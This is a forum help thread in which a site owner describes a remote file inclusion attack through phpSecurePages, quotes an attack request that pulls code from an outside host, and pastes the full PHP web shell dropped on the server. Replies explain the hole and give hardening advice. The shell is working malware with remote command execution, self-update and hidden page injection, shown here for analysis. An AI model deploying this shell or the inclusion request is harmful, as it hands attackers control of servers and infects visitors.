
repeated hacking attempts


ziggy1621


I've got a site that an IRC bot seems to be attacking, writing an ActiveX virus after the <body> tags. I've been fighting this for weeks and here is what I have....

 

It is shared hosting, so php.ini is not available and my htaccess is limited. Register_Globals was on, today I turned it off after some extensive reading. The hacker is running code like the following found in my logs:

 

//phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php 

 

where the host it gets the file from changes each time, so blocking IPs/domains doesn't work. I have actually deleted phpSecurePages from the site, and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses; sometimes it then creates a randomly named file with the following code

 

<?php
// Sample reproduced from the forum post for analysis: the dropper/web shell the
// attacker left behind after the phpSecurePages remote-include hole was exploited.
// Both calls keep the script running after the client disconnects and without a
// time limit, so the file-fetching loops further down finish even if the request
// that triggered them is aborted.
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
    // Deletes the shell's own state files from the current directory:
    // "c" (state written by Gen()), "1r" (list of generated index pages) and
    // "log" (not written by any function shown here).
    // IR note: these three file names, sitting next to the dropper, are
    // indicators worth searching for across the webroot.
    unlink("c");
    unlink("1r");
  unlink("log");
}

function Clear2()
{
    // "Un-inject" routine: reverses what MRepl() does to the victim page.
    // The file "m" holds the victim page's name, relative to the parent directory.
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    // Strip the <dd4>...<dd5> block that MRepl() appends, plus a comment-style
    // variant of the same markers. ereg_replace is deprecated/removed in PHP 7,
    // so this sample only runs on PHP 5 hosts.
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    // Also remove links to the "_lm" index pages that Gen() creates and any
    // "http...tmp6...</a>" links (presumably from an earlier variant).
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
    // The zero-size <font> tag is what keeps the injected content invisible in
    // a browser; it is the same opening tag MRepl() uses in $begtag.
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    // Response marker the controller looks for.
    echo " upt-ok";
}

function GetVar($name, &$var)
{
    // Reads request parameter $name into $var, checking POST first and then GET,
    // so a GET value overrides a POST value of the same name.
    // Returns false when the resulting value is the empty string, true otherwise.
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

  if (isset($_GET[$name]))
        $var = $_GET[$name];
    
    // Loose comparison against "" — only an empty string counts as "not set" here.
    if (($var) =="")
      return  false;
      else return true;
}

function Gen()
{
    // Page-generation routine, dispatched by Main() when a "g" parameter is present.
    // It fills a directory tree under the current directory with .htm files fetched
    // from a location the attacker supplies:
    //   sg - prefix (URL or path); "$sg"."2.txt" is fetched and written as the new
    //        directory's .htaccess, "$sg"."sgen.php" is queried for page content.
    //   gm - becomes $curs, used both in the generator query and in the file names.
    // State between calls lives in "c": four lines (top dir, sub dir, $curs, counter).
    // IR note: hunt for random five-letter directories containing an .htaccess and
    // three-letter subdirectories full of "<name>_<n>.htm" files; "1r" lists the
    // "<name>_lm.htm" index pages created every 100 files.
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();   // never read in this function
    // GET overrides POST for both parameters, the same order GetVar() uses.
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

  if (isset($_GET["sg"]))
        $sg = $_GET["sg"]; 
        
    if (isset($_POST["gm"]))
      $g = $_POST["gm"];

    if (isset($_GET["gm"]))
        $g = $_GET["gm"];
        
        
    $path = "";
    // "1r" accumulates the paths of generated index pages across calls.
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        // Resume from the state saved by a previous call.
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            // After 100 pages, restart the counter in a fresh three-letter
            // subdirectory under the same top directory.
            $pid = 0;
            $rnd = mt_rand(0, 999);   // unused
            $nm = "";
        for ($i=0; $i<3; $i++)
          {
              $ran = mt_rand(0,26);
              $sym = $alp[$ran];
              $nm = $nm.$sym;
          }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else 
    {
        // First run: create a random five-letter top directory ...
        $rnd = mt_rand(0, 999);   // unused
        $nm = "";
      for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        // ... whose .htaccess is whatever "$sg"."2.txt" returns, i.e. attacker-supplied
        // content. Defenders should diff any .htaccess found in such directories.
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        // ... and a random three-letter subdirectory for the generated pages.
        $rnd = mt_rand(0, 999);   // unused
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
    mkdir("$tname/$cname");
    }
    // Fetch ten pages per call from the generator. When $sg is a URL this is a
    // remote fopen(), which only works with allow_url_fopen enabled (the poster's
    // host had it on, per the thread).
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        
        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }
    
    // $j is $pid+10 after the loop, so this fires on the tenth batch only: fetch
    // an index page ("m=1"), save it as "<curs>_lm.htm" and record its path in "1r".
    if ($j==100)
    {
      $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        // $path is always "", so the recorded path starts with "/".
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }
    
    // Persist state for the next call; the counter is the next page index.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

function Update()
{
    // Self-update: fetches whatever the "u" parameter points at (path or URL —
    // fopen() accepts both when allow_url_fopen is on) and overwrites "1.php"
    // with it. The hard-coded name suggests the dropper itself is deployed as
    // "1.php", but that is not confirmed by anything else in the sample.
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];
      
    if (isset($_GET['u']))
         $u = $_GET['u'];
         
     $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
    // Remote command execution backdoor: the "c" parameter is passed straight to
    // system(). The "@" suppresses any warning, so failures leave no PHP error
    // trace. Detection: any request to this file carrying a "c" parameter is an
    // attack, and the resulting child processes run as the web server user, which
    // is why the thread's advice to rebuild rather than clean up is sound.
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}

function MRepl()
{
    // Page injection: appends attacker content to the victim page named in "m"
    // (relative to the parent directory), hidden inside a zero-size <font> tag and
    // bracketed by <dd4>/<dd5> markers so Clear2() can find and remove it later.
    // This matches the poster's report of content appearing after the <body> tag.
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    // "mpt" is the path or URL of the payload to inject.
    GetVar("mpt", $mpt);
     // remove the closing html tags (translated from the original's mis-encoded Cyrillic comment)
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
    // Drop any previously injected block so re-injection does not stack.
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
  $drs = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         // A falsy line aborts the whole request before the victim file is
         // rewritten, so a failed payload fetch leaves the page untouched.
         if (!$fc) 
         {  
       exit();
         }
       $drs .= $fc;
    }
  fclose($fp);
    // Rebuild the page: original content (minus closing tags) + hidden payload
    // + closing tags, then write it back in place.
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

function Main()
{
    // Dispatcher: the first matching request parameter (POST or GET) selects one
    // action and the script exits afterwards. Parameter-to-function map:
    //   u   -> Update()  (replace 1.php)      c   -> Com()    (run shell command)
    //   g   -> Gen()     (generate pages)     s   -> MRepl()  (inject into page)
    //   cl  -> Clear()   (delete state files) cl2 -> Clear2() (un-inject)
    // With none of them present it prints "<ok>", which a controller can use as
    // a liveness probe. Note that Gen() itself reads "sg"/"gm", not "g".
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }
    
    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }
    
    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }
    
    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }
    
  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }
    
    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }
    
    echo "<ok>";
    
}

// Entry point: every request to this file goes through the dispatcher above.
Main();

?>

Any Help Appreciated... I'm dying here


Anytime I use $_GET variables, I always check them against a whitelist contained in an array.  If its not in the array, it just outputs 'Page Error'.

 

Example:

 

www.mysite.com/index.php?action=help

 

in my code, I have:

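// Whitelist the "action" request parameter before anything else uses it. This is a
// permitted-values check, not escaping: it must run before the value reaches any
// file path, query or include.
$action = isset($_GET['action']) ? $_GET['action'] : "";
//....
$allowable_actions = array('help', 'delete');
// strict: true so that only an exact string match passes; loose in_array()
// comparison is subject to PHP type juggling and is the usual way such
// whitelists get bypassed or behave differently across PHP versions.
if(!in_array($action, $allowable_actions, true)) die('Page Error');
// ... rest of code...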

so if action is not 'help' or 'delete', it kills the application and prevents any tampering.  There is more to do, like running the $_GET superglobal through a sanitizer, but this little whitelist goes a long way.


I hate to tell you but if he's putting a file on your server then you've been compromised.  You need to reinstall from scratch.  Period. You MIGHT get lucky with a rootkit but prolly he's got crap in your system. It could be something like the ls command, for example, having been patched to recreate it, or whatever.

 

You're screwed. 

 

1. Linux or Winblow?

2. Virt domain or host domain?

3. Your server or hosted?

 


Wipe every file you can. Fix security hole on a local test server. Re-upload.

I wouldn't advise that unless you know for sure that the server is compromised.  If he has remote inclusion turned off, the hack attempt he is talking about is useless and is only showing up in logs...

 


The phpSecurePages script (despite its name) was setting up the cfgProgDir variable in the main file as the name of a file to be included in the setup.php file. Since register_globals and allow_url_fopen were on, this allowed the GET parameter on the end of the url to set cfgProgDir when setup.php was requested directly, and external raw php code was included and executed on the server (almost as if a hacker had written this script to work this way.) The phpSecurePages script has since been patched to make sure this specific security hole has been closed, but too late for everyone whose site has been taken over.

 

Since any possible code could have been included and executed, anything could have been changed that php has access to, such as other .php files could have been modified or whole files added, any available shell() command could have been executed, or any usernames/passwords stored in php files or in a database could have been read or added to...

 

If your site is still being taken over after you have deleted the phpSecurePages script, you need to find out how it is being done. If you compare all the filenames and file contents with a good backup version and compare the contents of all databases with a good backup version, you should be able to find out what has been changed. You can either remove the added/changed files or database entries, or you can delete everything and restore from a good backup version.

